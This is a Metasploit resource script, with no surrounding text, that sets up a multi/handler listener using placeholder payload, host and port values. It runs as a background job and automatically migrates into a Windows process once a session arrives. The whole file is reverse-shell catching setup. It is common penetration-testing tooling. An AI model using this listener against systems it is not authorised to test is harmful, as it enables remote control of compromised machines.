use exploit/multi/handler
set PAYLOAD aaa
set LHOST bbb
set LPORT ccc
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
set AutoRunScript post/windows/manage/migrate
exploit -j
